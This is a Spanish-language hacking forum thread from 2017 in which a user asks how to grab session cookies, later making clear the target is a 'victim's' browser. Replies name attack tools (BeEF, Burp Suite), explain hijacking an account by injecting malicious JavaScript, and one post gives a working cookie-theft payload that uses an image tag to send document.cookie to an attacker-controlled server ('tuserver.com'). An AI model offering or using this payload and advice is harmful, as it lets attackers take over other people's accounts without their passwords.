Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: La-Bestia en Mayo 16, 2017, 10:11:20 AM

Título: [SOLUCIONADO] Como capturar cookies de sesión.
Publicado por: La-Bestia en Mayo 16, 2017, 10:11:20 AM
Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.

No sé si me explico.

Saludos.
Título: Re:Como capturar cookies de sesión.
Publicado por: R3v0lve en Mayo 16, 2017, 11:05:20 AM
Se puede desde el navegador colega, o creo con beef puedes capturar

Enviado desde mi SM-G928T mediante Tapatalk

Título: Re:Como capturar cookies de sesión.
Publicado por: xhc1 en Mayo 16, 2017, 12:05:20 PM
burp suite, te lo facilita tambien y un borrado en el propio navegador
Título: Re:Como capturar cookies de sesión.
Publicado por: linuxmeister en Mayo 16, 2017, 12:36:12 PM
Si quieres obtener la cookie solo tienes que ejecutar una línea de javascript
var cookie = document.cookie

Luego con eso ya puedes imaginarte la de miles de cosas que puedes hacer, solo es pensar
Título: Re:Como capturar cookies de sesión.
Publicado por: DUDA en Mayo 16, 2017, 12:38:59 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.

No sé si me explico.

Saludos.

Pasate por aquí: https://underc0de.org/foro/hacking/obtener-credenciales-https-con-bettercap-y-sslstrip/

Gracias por leer!
DUDA
Título: Re:Como capturar cookies de sesión.
Publicado por: blackdrake en Mayo 16, 2017, 05:54:19 PM
Hola!

Antes que nada te recomiendo el taller de seguridad web (al menos el número #1) https://underc0de.org/foro/talleres-underc0de-213/taller-de-seguridad-web-1/ dónde se trata el tema del robo de cookies mediante javascript.

Llegados a este punto y puesto a que en tu caso tienes acceso directo al pc, es bastante simple y puedes utilizar cualquier método de los que hay en la siguiente lista:


Espero haberte ayudado,

Un saludo.
Título: Re:Como capturar cookies de sesión.
Publicado por: seth en Mayo 16, 2017, 09:00:21 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola, me gustaría saber como "captar" las sesiones de cookie ya hechas. Se puede hacer con alguna herramienta.
O sea, yo tengo ya en el Chrome iniciado el facebook, como hago para captar esa sesión ya iniciada o eliminar esos cookie para que lo vuelva a colocar.

No sé si me explico.

Saludos.

para ver la cookie abris la consola de chrome y escribis document.cookie

para borrarla, muchas veces alcanza con desloguearte de la web. Si no, abris la consola y pones document.cookie=''
Eso ultimo no lo probé, pero creo que funciona
Título: Re:Como capturar cookies de sesión.
Publicado por: La-Bestia en Mayo 17, 2017, 06:56:12 PM
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.
Título: Re:Como capturar cookies de sesión.
Publicado por: linuxmeister en Mayo 17, 2017, 07:01:33 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.

Lo primero que tienes que entender es que javascript es un lenguaje de lado del cliente, es decir, se ejecuta en tu navegador. Tu objetivo sería hacerte con la cookie de tu víctima, ya sea usando alguna herramienta anteriormente mencionada o inyectando tu un simple js malicioso y haciendo que tu víctima lo ejecute en su navegador. Después cogerías tu sesión y cambiarías la cookie a la de tu víctima para gozar de sus mismos privilegios, es decir si tu victima tiene una cuenta llamada Pepito, si utilizas su cookie pasarías a estar logeado en la cuenta Pepito sin necesidad de poner la contraseña
Título: Re:Como capturar cookies de sesión.
Publicado por: La-Bestia en Mayo 17, 2017, 07:07:19 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Haber si me entero jeje. Sería borrar cookie del navegador de la victima no de mi navegador o estando en el navegador de la victima. Se puede si o no? Muchas gracias.

Lo primero que tienes que entender es que javascript es un lenguaje de lado del cliente, es decir, se ejecuta en tu navegador. Tu objetivo sería hacerte con la cookie de tu víctima, ya sea usando alguna herramienta anteriormente mencionada o inyectando tu un simple js malicioso y haciendo que tu víctima lo ejecute en su navegador. Después cogerías tu sesión y cambiarías la cookie a la de tu víctima para gozar de sus mismos privilegios, es decir si tu victima tiene una cuenta llamada Pepito, si utilizas su cookie pasarías a estar logeado en la cuenta Pepito sin necesidad de poner la contraseña

Y sabes de algún js ya montado para este menester
?

O más o menos como montarlo. Estoy pegado en esto de la programación como bien sabes  :D
Título: Re:Como capturar cookies de sesión.
Publicado por: linuxmeister en Mayo 17, 2017, 07:22:01 PM
Pues con lo que te he respondido antes podrías hacerte una idea. Con document.cookie te devuelve el valor de la cookie, solo tienes que enviarlo desde el navegador de la victima a algun lugar controlado por ti para almacenar la cookie.
En google hay cientos de miles de ejemplos, no es necesario perder tiempo reinventando la rueda.
Con hacer una petición post con el valor de la cookie a un servidor tuyo basta. Por ejemplo

document.write('<img src="https://tuserver.com/receptor.php?cookie='+document.cookie+'"/>')

Esta es una de las técnicas más típicas, sabiendo un poco de javascript solo es cuestión de pensar y ser creativo ^^
Título: Re:Como capturar cookies de sesión.
Publicado por: magodiesan en Mayo 17, 2017, 09:39:25 PM
Ejecuta el
Código (javascript) [Seleccionar]
document.cookie como te están diciendo en la consola.

Me estaba preguntando si se podía hacer un programa maligno que te extraiga las cookies de un navegador, he visto que publican muchas cookies de usuarios de Netflix para ver Netflix gratis, cómo las robarán??
Título: Re:Como capturar cookies de sesión.
Publicado por: ANTRAX en Mayo 24, 2017, 11:41:16 PM
Acá te dejo un taller completo que habla sobre como capturar cookies

https://underc0de.org/foro/talleres-underc0de-213/taller-de-seguridad-web-1/

Saludos,
ANTRAX